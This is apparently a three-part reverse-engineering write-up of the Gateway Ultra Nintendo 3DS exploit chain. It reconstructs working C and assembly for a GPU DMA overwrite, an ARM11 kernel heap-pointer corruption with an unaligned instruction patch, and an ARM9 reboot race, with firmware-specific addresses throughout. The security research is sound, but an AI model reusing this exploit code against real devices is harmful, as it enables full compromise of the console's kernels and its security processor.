Reversing Gateway Ultra Stage 3: Owning ARM9 Kernel

First, some background: the 3DS has two main processors. Last time, I went over how Gateway Ultra exploited the ARM11 processor. However, most of the functionality that is interesting from a security perspective is handled by a separate ARM946 processor. The ARM9 processor is in charge of the initial system bootup, some system services, and most importantly all the cryptographic functions such as encryption/decryption and signature verification. In this post, we will look at how to run (privileged) code on the ARM9 processor given privileged access to the ARM11 processor. Please note that this writeup is a work in progress as I have not completely figured out how the exploit works (only the main parts of it). Specifically, there are a couple of steps where I do not know whether they are done for the sake of the exploit or purely for stability or obfuscation. From a developer’s perspective, it doesn’t matter because as long as you perform all the steps, you will achieve code execution. But from a hacker’s perspective, the information is not complete unless all aspects are known and understood. I am posting this now as-is because I do not know when I’ll have time to work on the 3DS again. However, when I do, I will update the post and hopefully clear up all confusion.


For simplicity in description, from this point on, I will use pointers and offset values specific to the 4.x kernel. However, the code is the same for all firmware versions.

void arm11_kernel_entry(void) // pointers specific to 4.x
{
  int (*sub_FFF748C4)(int, int, int, int) = 0xFFF748C4;

  __clrex(); // release any exclusive access
  memcpy(0xF3FFFF00, 0x08F01010, 0x1C);// copy GW specific data
  clear_framebuffer(); // clear screen and saves some GPU registers
  // ARM9 code copied to FCRAM 0x23F00000
  memcpy(0xF3F00000, ARM9_PAYLOAD, ARM9_PAYLOAD_LEN);
  // write function hook at 0xFFFF0C80
  memcpy(0xEFFF4C80, jump_table, FUNC_LEN);
  // write FW specific offsets to copied code buffer
  *(int *)(0xEFFF4C80 + 0x60) = 0xFFFD0000; // PDN regs
  *(int *)(0xEFFF4C80 + 0x64) = 0xFFFD2000; // PXI regs
  *(int *)(0xEFFF4C80 + 0x68) = 0xFFF84DDC; // where to return to from hook
  // patch function 0xFFF84D90 to jump to our hook
  *(int *)(0xFFF84DD4 + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFF84DD4 + 4) = 0xFFFF0C80; // jump_table + 0
  // patch reboot start function to jump to our hook
  *(int *)(0xFFFF097C + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFFF097C + 4) = 0x1FFF4C84; // jump_table + 4
  sub_FFF748C4(0, 0, 2, 0); // trigger reboot
}

// not called directly, offset determines jump
void jump_table(void)
{
  // jump_table + 0: entry for func_patch_hook
  // jump_table + 4: entry for reboot_func
}

void func_patch_hook(void)
{
  // data written from entry
  int pdn_regs;
  int pxi_regs;
  int (*func_hook_return)(void);
  int i;

  // save context
  __asm__ ("stmfd sp!, {r0-r12,lr}");
  // TODO: Why is this needed?
  pxi_send(pxi_regs, 0);
  pxi_send(pxi_regs, 0x10000);
  // TODO: What does this do?
  *(char *)(pdn_regs + 0x230) = 2;
  for (i = 0; i < 16; i += 2); // busy spin
  *(char *)(pdn_regs + 0x230) = 0;
  for (i = 0; i < 16; i += 2); // busy spin
  // restore context and run the two instructions that were replaced
  __asm__ ("ldmfd sp!, {r0-r12,lr}\t\n"
           "ldr r0, =0x44836\t\n"
           "str r0, [r1]\t\n"
           "ldr pc, %0" :: "m" (func_hook_return));
}

// this is a patched version of function 0xFFFF097C
// stuff found in the original code are skipped
void reboot_func(void)
{
  ... // setup
  // disable all interrupts
  __asm__ ("mrs r0, cpsr\t\n"
           "orr r0, r0, #0x1C0\t\n"
           "msr cpsr_cx, r0" ::: "r0");
  while ( *(char *)0x10140000 & 1 ); // wait for powerup ready
  *(void **)0x2400000C = 0x23F00000; // our ARM9 payload
}

Memory Configurations

A quick side-note on the way that ARM11 talks to ARM9. There is a FIFO with a register interface, called the PXI, that is used to pass data between the two processors. Additionally, most of the physical memory mappings are shared between the two processors. Data stored, for example, in the FCRAM or AXI WRAM can be seen by both processors (provided proper cache coherency). However, there is one region (physical 0x08000000 to 0x08100000) that only the ARM9 processor can see. ARM9 code runs in this region. Another thing to note is that the ARM9 processor only uses one-to-one memory addressing (i.e. physical addresses and virtual addresses are the same), but I have been told that it does have memory protection enabled.

ARM9 Process

The ARM9 processor only (ever) has one process running, Process9, which speaks with the kernel to handle commands from ARM11. Process9 has access to a special syscall 0x7B, which takes in a function pointer and executes it in kernel mode. This means that essentially, owning ARM9 usermode is enough to get kernel code execution without any additional exploits.

Exploit Setup

After doing some housekeeping, the first thing the second stage payload code does is copy the third stage ARM9 code to a known location in FCRAM. Next, it patches two ARM11 kernel functions. First, it patches the function at 0xFFF84D90 (I believe this function performs the kernel reboot) to jump into a function hook early on. Second, it patches the function at 0xFFFF097C (I believe this function is run after the ARM11 processor resets) to jump into another function hook. These two hooks are the key to how the exploit works.

Soft Rebooting

The 3DS supports soft rebooting (resetting the processor state without clearing the memory) in order to switch modes (e.g. for DS games) and presumably to enable entering and exiting sleep mode. I believe this is triggered at the end of the exploit setup by calling the function at 0xFFF748C4. At some point in this function, the subroutine at 0xFFF84D90 is called, which runs the code in our first function hook before continuing execution.

At the same time on the ARM9 processor, Process9 now waits for a special command, 0x44836, from PXI in the function at 0x0807B97C. I believe that the first function hook in ARM11 sends a series of commands to put Process9 into function 0x0807B97C; however, that is only a guess.

The ARM11 processor continues to talk with ARM9 through the PXI and at some point both agree on a shared buffer in FCRAM at 0x24000000 (EDIT: yellows8 says this is the FIRM header) where some information is stored. At 0x2400000C is a function pointer to what ARM9 should execute after the reset. Process9 verifies that this function pointer is in the ARM9 private memory region 0x08000000-0x08100000 (EDIT: I assume the FIRM header signature check also takes place at this point). ARM11 resets and spinlocks in the function at 0xFFFF097C to wait for ARM9 to finish its tasks and tell ARM11 what to do.

Process9 at this point uses SVC 0x7B to jump into some reset handler at 0x080FF600 in kernel mode. At the end of that function, the ARM9 kernel reads the pointer value at 0x2400000C and jumps to it.

Reset ToCTToU

The problem here is simple. Process9 checks that the data at 0x2400000C (which is FCRAM, shared by both processors) is a valid pointer to code in ARM9 private memory (that ARM11 cannot access). However, after the check passes and before the function pointer is used, ARM11 can overwrite the value to point to code in FCRAM and ARM9 will execute it when it resets. This time-of-check-to-time-of-use bug is made possible by patching the ARM11 function that runs after reset so that it can wait for the right signal and then quickly overwrite the data in FCRAM before ARM9 uses it.
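The race described above can be modelled on a host machine. The following is a minimal sketch, not the actual Process9 or kernel code: `shared_entry` stands in for the word at FCRAM 0x2400000C, and `entry_is_valid`, `arm11_overwrite` and `arm9_reset_model` are hypothetical names introduced only for illustration. The "race" is simulated by calling a callback between the check and the use.

```c
#include <assert.h>
#include <stdint.h>

#define ARM9_PRIV_START 0x08000000u
#define ARM9_PRIV_END   0x08100000u /* exclusive */

/* Hypothetical stand-in for the shared word at FCRAM 0x2400000C. */
volatile uint32_t shared_entry;

/* Time of check: accept only pointers inside ARM9 private memory. */
int entry_is_valid(uint32_t entry)
{
    return entry >= ARM9_PRIV_START && entry < ARM9_PRIV_END;
}

/* Hypothetical model of the patched ARM11 reboot function winning the race. */
void arm11_overwrite(void)
{
    shared_entry = 0x23F00000u; /* ARM9 payload copied to FCRAM earlier */
}

/* Returns the address the model would jump to, or 0 if the check fails.
 * `racer` runs in the window between check and use; pass 0 for no racer. */
uint32_t arm9_reset_model(void (*racer)(void))
{
    if (!entry_is_valid(shared_entry)) /* check */
        return 0;
    if (racer)
        racer();                       /* window between check and use */
    return shared_entry;               /* use: the value is read again */
}
```

With a valid pointer in `shared_entry` and no racer, the model returns that pointer. With `arm11_overwrite` as the racer it returns 0x23F00000 even though the check passed. Copying the value into a private variable before checking it would close the window in this model.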


I apologize for the vagueness and likely mistakes in parts. I hope that if I don’t have the time to finish this analysis, someone else can pick up where I left off. Specifically, there are a couple of main questions that I haven’t answered:

  1. What is the function at 0xFFF748C4, what do the arguments do, and how does it call into function 0xFFF84D90? I speculate that it’s a function that performs the reset, but a more precise description is needed.
  2. What is the purpose of the first function hook? Specifically why does it send 0 and 0x10000 through PXI and what does PDN register 0x230 do?
  3. How does Process9 enter function 0x0807B97C? I suspect that it may have something to do with the first function hook in ARM11.

I hope that either someone can answer these questions (as well as correct any mistakes I’ve made) or that I’ll have time in the future to continue this analysis. This will also be the end of my journey to reverse Gateway Ultra (but the next release may spark my interest again). I don’t particularly care about the later stages (I hear there’s a modified MIPS VM and timing based obfuscation) or how Gateway enforces DRM to make sure only their card is used. If I do any more reversing with the 3DS, it would be on the kernel and applications so I can make patches of my own instead of worrying about how Gateway does it.

At this point, the information should be enough for anyone to take complete control of the 3DS (<= 9.2.0). I believe that information on its own is amoral but it takes people to make it immoral. There’s no point in arguing if piracy is right or wrong or if making this information public would help or harm pirates. I am not here to ensure the 3DS thrives. I am not here to take business away from Gateway. I am not here to be a moral police. I am only here to make sure that information is available for those who thirst for knowledge as much as I do in a form that is as precise and accurate as I can make it.

Reversing Gateway Ultra Stage 2: Owning ARM11 Kernel

It’s been a couple of days since my initial analysis of Gateway Ultra, released last week to enable piracy on 3DS. I spent most of this time catching up on the internals of the 3DS. I can’t thank the maintainers of 3dbrew enough (especially yellows8, the master of 3DS reversing) for the amount of detailed and technical knowledge found on the wiki. The first stage was a warmup and did not require any specific 3DS knowledge to reverse. The problem with the second stage is that while it is easy to see where the exploit is triggered and which code gets run, the actual exploit itself was not as clear. I looked at all the function calls made, formed a couple of hypotheses about where the vulnerability resided, and reversed each function to the end to test them. Although there were many dead ends and false leads, the process of reversing all these functions solidified my understanding of the system.


As always, I like to post the reversed code first so those with more knowledge than me don’t have to read my verbose descriptions. I will explain the interesting parts afterwards. I am including the full code listing of the shellcode including parts that are irrelevant either because it is used as obfuscation, to provide stability, or as setup for later parts.

int memcpy(void *dst, const void *src, unsigned int len);
int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
                      int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
int svcControlMemory(void **outaddr, unsigned int addr0, unsigned int addr1, 
                     unsigned int size, int operation, int permissions);

int
do_gspwn_copy (void *dst, unsigned int len, unsigned int check_val, int check_off)
{
    unsigned int result;

    do
    {
        memcpy (0x18401000, 0x18401000, 0x10000);
        GSPGPU_FlushDataCache (0x18402000, len);
        // src always 0x18402000
        GX_SetTextureCopy(0x18402000, dst, len, 0, 0, 0, 0, 8);
        GSPGPU_FlushDataCache (0x18401000, 16);
        GX_SetTextureCopy(dst, 0x18401000, 0x40, 0, 0, 0, 0, 8);
        memcpy(0x18401000, 0x18401000, 0x10000);
        result = *(unsigned int *)(0x18401000 + check_off);
    } while (result != check_val);

    return 0;
}

int
arm11_kernel_exploit_setup (void)
{
    unsigned int patch_addr;
    unsigned int *buffer;
    int i;
    int (*nop_func)(void);
    int *ipc_buf;
    int model;

    // part 1: corrupt kernel memory
    buffer = 0x18402000;
    // 0xFFFFFE0 is just stack memory for scratch space
    svcControlMemory(0xFFFFFE0, 0x18451000, 0, 0x1000, 1, 0); // free page
    patch_addr = *(int *)0x08F028A4;
    buffer[0] = 1;
    buffer[1] = patch_addr;
    buffer[2] = 0;
    buffer[3] = 0;
    // overwrite free pointer
    do_gspwn_copy(0x18451000, 0x10u, patch_addr, 4);
    // trigger write to kernel
    svcControlMemory(0xFFFFFE0, 0x18450000, 0, 0x1000, 1, 0);

    // part 2: obfuscation or trick to clear code cache
    for (i = 0; i < 0x1000; i++)
        buffer[i] = 0xE1A00000; // ARM NOP instruction
    buffer[i-1] = 0xE12FFF1E; // ARM BX LR instruction
    nop_func = *(unsigned int *)0x08F02894 - 0x10000; // 0x10000 below current code
    do_gspwn_copy(*(unsigned int *)0x08F028A0 - 0x10000, 0x10000, 0xE1A00000, 0);
    nop_func ();

    // part 3: get console model for future use (?)
    __asm__ ("mrc p15,0,%0,c13,c0,3\t\n"
             "add %0, %0, #128\t\n" : "=r" (ipc_buf));

    ipc_buf[0] = 0x50000;
    __asm__ ("mov r4, %0\t\n"
             "mov r0, %1\t\n"
             "ldr r0, [r0]\t\n"
             "svc 0x32\t\n" :: "r" (ipc_buf), "r" (0x3DAAF0) : "r0", "r4");

    if (ipc_buf[1])
        model = ipc_buf[2] & 0xFF;
    else
        model = -1;
    *(int *)0x8F01028 = model;

    return 0;
}

// after running setup, run this to execute func in ARM11 kernel mode
int __attribute__((naked))
arm11_kernel_exploit_exec (int (*func)(int, int, int), int arg1, int arg2)
{
    __asm__ ("mov r5, %0\t\n" // R5 = 0x3D1FFC, not used. likely obfuscation.
             "svc 8\t\n" // CreateThread syscall, corrupted, args not needed
             "bx lr\t\n" :: "r" (0x3D1FFC) : "r5");
}


The main vulnerability is actually still gspwn. Whereas in the first stage, it was used to overwrite (usually read-only) code from a CRO dynamic library to get userland code execution, it is now used to overwrite a heap free pointer so when the next memory page is freed, it would overwrite kernel memory.

3DS Memory Layout

To understand how the free pointer write corruption works, let’s first go over how the 3DS memory is laid out (in simple terms). You can get the full picture here, but I want to go over some key points. First, the “main” memory (used by applications and services) called the FCRAM is located at physical address 0x20000000 to 0x28000000. It is mapped in virtual memory in many places. First, the main application which is at around FCRAM 0x23xxxxxx (or higher if it is a system process or applet like the web browser) is mapped to 0x00100000 as read-only. Next we have some pages in the FCRAM 0x24xxxxxx region that can be mapped by the application on demand to virtual address 0x18xxxxxx through the syscall ControlMemory. Finally, the entire FCRAM is mapped in kernel 0xF0000000 – 0xF8000000 (this is for 4.1, different in other versions).
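To make the address arithmetic concrete, here is a small sketch of the translations used throughout this post. The helper names are hypothetical. The 0xF0000000 kernel base is the 4.1 value given above, the 0xE0000000 base for 9.2 is an assumption inferred from the 0xE4450000 pointer mentioned later in this post, and the user heap offset assumes the 0x18xxxxxx pages map linearly onto FCRAM 0x24xxxxxx (which matches the 0x18451000 and 0x24451000 pair used by the exploit).

```c
#include <assert.h>
#include <stdint.h>

#define FCRAM_PHYS_BASE 0x20000000u
#define FCRAM_SIZE      0x08000000u

#define KERNEL_FCRAM_BASE_4_1 0xF0000000u /* from the text above */
#define KERNEL_FCRAM_BASE_9_2 0xE0000000u /* assumption, see lead-in */

/* FCRAM physical address -> kernel linear-map virtual address. */
uint32_t fcram_phys_to_kernel_va(uint32_t pa, uint32_t kernel_base)
{
    assert(pa >= FCRAM_PHYS_BASE && pa - FCRAM_PHYS_BASE < FCRAM_SIZE);
    return kernel_base + (pa - FCRAM_PHYS_BASE);
}

/* User heap virtual address (0x18xxxxxx) -> FCRAM physical address,
 * assuming the linear 0x18000000 <-> 0x24000000 relation noted above. */
uint32_t user_heap_va_to_fcram_phys(uint32_t va)
{
    return va - 0x18000000u + 0x24000000u;
}
```

For example, the page the exploit frees at user address 0x18451000 is FCRAM 0x24451000, which the 4.1 kernel sees at 0xF4451000.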

Another note about memory is that the ARM11 kernel is not located in the FCRAM, but in something called the AXI WRAM. The name is not important, but what is important is that its physical address 0x1FF80000 is mapped twice in kernel memory space. 0xFFF60000 is marked read-only executable and 0xEFF80000 is marked read-write non-executable. However, anything written through 0xEFF80000 can then be executed through 0xFFF60000, which defeats the whole purpose of marking the pages non-executable. Since these mappings only apply in kernel mode, you would still need to perform a write to that address with kernel permissions.

ControlMemory Unchecked Write

The usual process for handling user controlled pointers in a syscall is to use the special ARM instructions LDRT and STRT, which perform the pointer dereference with user privileges in kernel mode. However, what if we overwrite a pointer that the developers did not think is user controlled? It would use the regular LDR/STR instructions and dereference with kernel privileges. The goal is achieved by the ControlMemory syscall along with gspwn. The ControlMemory syscall is used to allocate and free pages of memory from the heap region of the FCRAM. When it is called to free, like most heap allocators, certain pointers are stored in the newly freed memory block (to point to the next and previous free blocks). Like most heap allocators, it also performs “coalescing,” which means two free blocks will be combined to form a larger free block (and the pointers to and from it are updated accordingly).

The plan here is to free a block of memory, which places certain pointers in the freed block. This is usually safe since once the user frees the block, it is unmapped from the user virtual memory space and they cannot access the memory any more. However, we can still reach it with gspwn, so we use gspwn to overwrite the free pointer so that it points at the code in the 0xEFF80000 region. This works because the pointer dereference is done with kernel permissions, since the pointers stored here are not normally user accessible.

The data stored in the freed region is as follows:

typedef struct free_data {
    int some_count;
    struct free_data *next_free_block;
    struct free_data *prev_free_block;
    int unk_C;
    int unk_10;
} free_data;

When the first ControlMemory call happens in the exploit, it frees FCRAM 0x24451000 and writes the free_data structure to it. We then use gspwn to overwrite next_free_block to point to the kernel code we want to overwrite. Next we call ControlMemory to free the page immediately before (FCRAM 0x24450000). This will coalesce the block with

((struct free_data *)0x24450000)->next_free_block = ((struct free_data *)0x24451000)->next_free_block;
((struct free_data *)0x24451000)->next_free_block->prev_free_block = (struct free_data *)0x24450000;

As you can see, we control next_free_block of 0x24451000 and therefore control the write.

… But we’re not done yet. The above pseudocode was an artist’s rendition of what happens. Obviously, physical addresses are not used here. The user region virtual address (0x18xxxxxx) is not used either. The pointers here are the kernel virtual addresses 0xF4450000 and 0xF4451000. Since we can only write the value 0xF4450000 (or on 9.2, it is 0xE4450000), this poses a problem. Ideally, we want to write some ARM instruction that allows us to jump to code we control (BX R0 for example); however, 0xF4450000 disassembles to “vst4.8 {d16-d19}, [r5], r0” (don’t worry, I don’t know what that is either) and 0xE4450000 disassembles to “strb r0, [r5], #-0”. Neither can (obviously) be used to control code execution. Now of course, we can try another address and see if we get lucky and the address happens to decode as a branch instruction, but we are not lucky. None of the user mappable/unmappable regions would give us a branch.
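The coalescing write can be modelled on a host machine with ordinary structs. This is a simplified sketch of the two pseudocode assignments only, not the real kernel routine; `coalesce` is a hypothetical name, and the `victim` struct in the usage example stands in for whatever memory the corrupted next_free_block points at.

```c
#include <assert.h>
#include <stddef.h>

struct free_data {
    int some_count;
    struct free_data *next_free_block;
    struct free_data *prev_free_block;
    int unk_C;
    int unk_10;
};

/* Simplified model of merging `lower` with the already-free block `upper`
 * that directly follows it. The real allocator does more bookkeeping. */
void coalesce(struct free_data *lower, struct free_data *upper)
{
    /* model precondition: upper has a successor in the free list */
    assert(upper->next_free_block != NULL);

    lower->next_free_block = upper->next_free_block;
    /* Unchecked write: the address of `lower` is stored into the
     * prev_free_block field of whatever upper->next_free_block points at.
     * On the 32-bit 3DS that field sits 8 bytes past the pointer. */
    upper->next_free_block->prev_free_block = lower;
}
```

If an attacker controls `upper.next_free_block` (here via gspwn), the second assignment writes the address of `lower` to a location of their choosing. The written value is not controlled, only the destination, which is the limitation discussed above.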

Unaligned Code Corruption

Here is the clever idea. What if we stop thinking of the problem as: how do I write an instruction that gives us execution control? but instead as: how do I corrupt the code to control it? I don’t usually like to post assembly listings, but it is impossible to dodge ARM assembly if you made it this far.

A note to systems programmers: There is a feature of ARMv6 that the 3DS enabled called unaligned read/write. This means a pointer does NOT have to be word aligned. In other words, you are allowed to write 4 bytes to an arbitrary address, including something like “0x1003”. Now if you’re not a systems designer and don’t know about the problem of unaligned reads/writes (C nicely hides this from you), don’t worry, it just means everything works as you expect it to.

Let’s take a look at an arbitrary syscall, CreateThread. The actual syscall doesn’t matter, we only care about the assembly code that it runs:

   0:	e52de004 	push	{lr}		; (str lr, [sp, #-4]!)
   4:	e24dd00c 	sub	sp, sp, #12
   8:	e58d4004 	str	r4, [sp, #4]
   c:	e58d0000 	str	r0, [sp]
  10:	e28d0008 	add	r0, sp, #8
  14:	eb001051 	bl	0x4160
  18:	e59d1008 	ldr	r1, [sp, #8]
  1c:	e28dd00c 	add	sp, sp, #12
  20:	e49df004 	pop	{pc}		; (ldr pc, [sp], #4)

How do we patch this to control code flow? What if we get rid of the “add” on line 0x1c? Then we have on line 0xc, *SP = R0 and on line 0x20, PC = *SP, and since we trivially control R0 in a syscall, we can pass in a function pointer and run it.
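The effect of dropping the “add” can be checked with a toy model of the stub’s stack traffic. This sketch only models the instructions that move or use SP; it assumes (for illustration) that the `bl` at 0x14 does not disturb the word stored at [sp]. The function name and the `keep_add_sp` flag are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Returns the value that `pop {pc}` at 0x20 would load into PC. */
uint32_t stub_return_target(uint32_t r0, uint32_t r4, uint32_t lr,
                            int keep_add_sp)
{
    uint32_t stack[8] = {0};
    unsigned sp = 8;        /* word index into stack[], grows downward */

    stack[--sp] = lr;       /* 0x00: push {lr}        */
    sp -= 3;                /* 0x04: sub sp, sp, #12  */
    stack[sp + 1] = r4;     /* 0x08: str r4, [sp, #4] */
    stack[sp] = r0;         /* 0x0c: str r0, [sp]     */
    if (keep_add_sp)
        sp += 3;            /* 0x1c: add sp, sp, #12  */
    assert(sp < 8);
    return stack[sp];       /* 0x20: pop {pc}         */
}
```

With the “add” in place the stub returns to the saved LR. Without it, the word on top of the stack is the caller’s R0, so that is where execution continues.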

Now if we replace the code at 0x18 with either 0xF4450000 or 0xE4450000, another problem arises. Both of those instructions (and there may be others from other firmware versions) try to dereference R5, which we don’t control. However, what if we write 0xF4450000/0xE4450000 starting at 0x1B? It would now corrupt two instructions instead of just one, but both are “safe” instructions.

  14:	eb001051 	bl	0x4160
  18:	009d1008 	addseq	r1, sp, r8
  1c:	e2e44500 	rsc	r4, r4, #0, 10

The actual code that is there isn’t particularly useful/important, which is exactly what we want. We successfully patched the kernel to jump to our code with a single syscall. Now making SVC 8 with R0 pointing to some function would run it in ARM11 kernel mode.
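The byte-level effect of the unaligned write can be reproduced on any host. The sketch below copies the instruction words from the CreateThread listing into a byte array in little-endian order, performs a 4-byte store at offset 0x1B, and reads back the affected words. The helper names are hypothetical; explicit byte shuffling is used so the result does not depend on the host’s endianness.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store a 32-bit value little-endian at any (possibly unaligned) offset. */
void store_le32(uint8_t *mem, size_t off, uint32_t v)
{
    for (size_t i = 0; i < 4; i++)
        mem[off + i] = (uint8_t)(v >> (8 * i));
}

/* Load a 32-bit little-endian value from any offset. */
uint32_t load_le32(const uint8_t *mem, size_t off)
{
    uint32_t v = 0;
    for (size_t i = 0; i < 4; i++)
        v |= (uint32_t)mem[off + i] << (8 * i);
    return v;
}

/* Write `value` at offset 0x1B of the stub and return the word at read_off. */
uint32_t patched_word(uint32_t value, size_t read_off)
{
    /* instruction words at offsets 0x00..0x20 from the listing above */
    static const uint32_t stub[9] = {
        0xe52de004, 0xe24dd00c, 0xe58d4004, 0xe58d0000, 0xe28d0008,
        0xeb001051, 0xe59d1008, 0xe28dd00c, 0xe49df004
    };
    uint8_t mem[sizeof stub];

    for (size_t i = 0; i < 9; i++)
        store_le32(mem, i * 4, stub[i]);
    store_le32(mem, 0x1B, value);   /* the unaligned kernel write */

    assert(read_off + 4 <= sizeof mem);
    return load_le32(mem, read_off);
}
```

Writing 0xE4450000 this way yields 0x009d1008 at 0x18 and 0xe2e44500 at 0x1c, matching the patched listing, while the words at 0x14 and 0x20 are untouched. Writing 0xF4450000 instead gives the same word at 0x18 and 0xe2f44500 at 0x1c.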


Although some may call this exploit overly simple, I thought the way it was exploited was very novel. It involved overwriting pointers that are meant to be inaccessible to users, then a type confusion of pointer to ARM code, and finally abusing unaligned writes to corrupt instructions in a safe way. Next time, I hope to conclude this series by reversing the ARM9 kernel exploit (for those unfamiliar, the 3DS has two kernels, one for applications and one for security, ARM9 is the interesting one). I want to thank, again, sbJFn5r for providing me with various dumps.

Reversing Gateway Ultra First Stage (Part 2)

When we last left off, we looked at the ROP code that loaded a larger second-part of the payload. Now we will walk through what was loaded and how userland native code execution was achieved. I am still an amateur at 3DS hacking so I am sure to get some things wrong, so please post any corrections you have in the comments and I will update the post as needed.


Some of the hard coded addresses are inside the stack payload loaded by the first part from Launcher.dat (at 0x08F01000).

int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
void memcpy(void *dst, const void *src, unsigned int len);

// There are offsets and addresses specific to each FW version inside of 
// the first stage that is used by both the first and second stage payloads
struct // example for 4.1.0
{
    void (*payload_code)(void); // 0x009D2000
    unsigned int unk_4; // 0x252D3000
    unsigned int orig_code; // 0x1E5F8FFD
    void *payload_target; // 0x192D3000
    unsigned int unk_10; // 0xEFF83C97
    unsigned int unk_14; // 0xF0000000
    unsigned int unk_18; // 0xE8000000
    unsigned int unk_1C; // 0xEFFF4C80
    unsigned int unk_20; // 0xEFFE4DD4
    unsigned int unk_24; // 0xFFF84DDC
    unsigned int unk_28; // 0xFFF748C4
    unsigned int unk_2C; // 0xEFFF497C
    unsigned int unk_30; // 0x1FFF4C84
    unsigned int unk_34; // 0xFFFD0000
    unsigned int unk_38; // 0xFFFD2000
    unsigned int unk_3C; // 0xFFFD4000
    unsigned int unk_40; // 0xFFFCE000
} fw_specific_data;

void payload() // base at 0x08F01000
{
    int i;
    unsigned int kversion;
    struct fw_specific_data *data;
    int code_not_copied;

    // part 1, some setup
    *(int*)0x08000838 = 0x08F02B3C;
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    for (i = 0; i < 3; i++) // do 3 times to be safe
    {
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F48F000, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F4C7800, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
    }

    kversion = *(unsigned int *)0x1FF80000; // KERNEL_VERSION register
    data = 0x08F02894; // buffer to store FW specific data

    // part 2, get kernel specific data from our buffer
    if (kversion == 0x02220000) // 2.34-0 4.1.0
        memcpy (data, 0x08F028D8, 0x44);
    else if (kversion == 0x02230600) // 2.35-6 5.0.0
        memcpy (data, 0x08F0291C, 0x44);
    else if (kversion == 0x02240000) // 2.36-0 5.1.0
        memcpy (data, 0x08F02960, 0x44);
    else if (kversion == 0x02250000) // 2.37-0 6.0.0
        memcpy (data, 0x08F029A4, 0x44);
    else if (kversion == 0x02260000) // 2.38-0 6.1.0
        memcpy (data, 0x08F029E8, 0x44);
    else if (kversion == 0x02270400) // 2.39-4 7.0.0
        memcpy (data, 0x08F02A2C, 0x44);
    else if (kversion == 0x02280000) // 2.40-0 7.2.0
        memcpy (data, 0x08F02A70, 0x44);
    else if (kversion == 0x022C0600) // 2.44-6 8.0.0
        memcpy (data, 0x08F02AB4, 0x44);

    // part 3, execute code
    do
    {
        // if the function has its original code, we try again
        code_not_copied = (*(unsigned int *)data->payload_code + data->orig_code) == 0;
        // copy second stage to FCRAM
        memcpy (0x18410000, 0x08F02B90, 0x000021F0);
        // make sure data is written and cache flushed || attempted GW obfuscation
        memcpy (0x18410000, 0x18410000, 0x00010000);
        memcpy (0x18410000, 0x18410000, 0x00010000);
        GSPGPU_FlushDataCache (0x18410000, 0x000021F0);
        // copy the second stage code
        GX_SetTextureCopy (0x18410000, data->payload_target, 0x000021F0, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        memcpy (0x18410000, 0x18410000, 0x00010000);
    } while (code_not_copied);

    // I think it was originally data->payload_code but later they hard coded it
    // for some reason
    ((void (*)(void))0x009D2000)();
}


The first part, I’m not too sure about. I think it’s either some required housekeeping or needless calls to obfuscate the exploit (found later). I couldn’t find any documentation on the 0x1F4XXXXX region except that it is in the VRAM. (EDIT: plutoo tells me it’s the framebuffer. Likely the screen is cleared black for debugging or something.) I am also unsure of the use of setting 0x08000838 to some location in the payload that is filled with “0x002CAFE4”. In the second part, version specific information for each released kernel version is copied to a global space for use by both the first stage and the second stage exploit code. (This includes specific kernel addresses and stuff).
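The version comments in the listing (for example 0x02230600 being “2.35-6”) suggest how the KERNEL_VERSION word is laid out, and the per-firmware blocks sit 0x44 bytes apart starting at 0x08F028D8. The sketch below encodes both observations. The byte layout is inferred from those comments rather than taken from documentation, and the function and struct names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct kernel_version {
    unsigned major, minor, revision;
};

/* Layout inferred from the listing's comments: 0xMMmmrr00. */
struct kernel_version decode_kernel_version(uint32_t reg)
{
    struct kernel_version v;
    v.major    = (reg >> 24) & 0xFF;
    v.minor    = (reg >> 16) & 0xFF;
    v.revision = (reg >> 8) & 0xFF;
    return v;
}

/* Table-driven equivalent of the if/else chain: returns the address of the
 * 0x44-byte block for this kernel, or 0 if the version is not listed. */
uint32_t fw_data_source(uint32_t kversion)
{
    static const uint32_t known[] = {
        0x02220000, 0x02230600, 0x02240000, 0x02250000,
        0x02260000, 0x02270400, 0x02280000, 0x022C0600
    };
    for (size_t i = 0; i < sizeof known / sizeof known[0]; i++)
        if (known[i] == kversion)
            return 0x08F028D8u + (uint32_t)i * 0x44u;
    return 0;
}
```

Note that the original chain has no final else, so on an unlisted kernel the data buffer is simply left as it was; the 0 return here is a choice made for this sketch.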

The meat of the exploit is an unchecked GPU DMA write that allows the attacker to overwrite read-only executable pages in memory. This is the same exploit used by smealum in his ninjhax and he gives a much better explanation of “gspwn” in his blog. In short, certain areas of the physical memory are mapped at some virtual address as read-only executable (EDIT: yellows8 tells me specifically, this is in a CRO, which is something like shared libraries for 3DS) but when the physical address of the same location is written to by the GPU, it does not go through the CPU’s MMU (since it is a different device) and can write to it. The need for thread sleep (and maybe the weird useless memcpys) is because the CPU’s various levels of cache need some time to see the changes that they did not expect from the GPU.

The second stage of the payload is the ARM code copied from Launcher.dat (3.0.0) offset 0x1B90 for a length of 0x21F0 (remember to decrypt it using the “add”-pad stream cipher described in the first post).

Raw ROP Payload Annotated

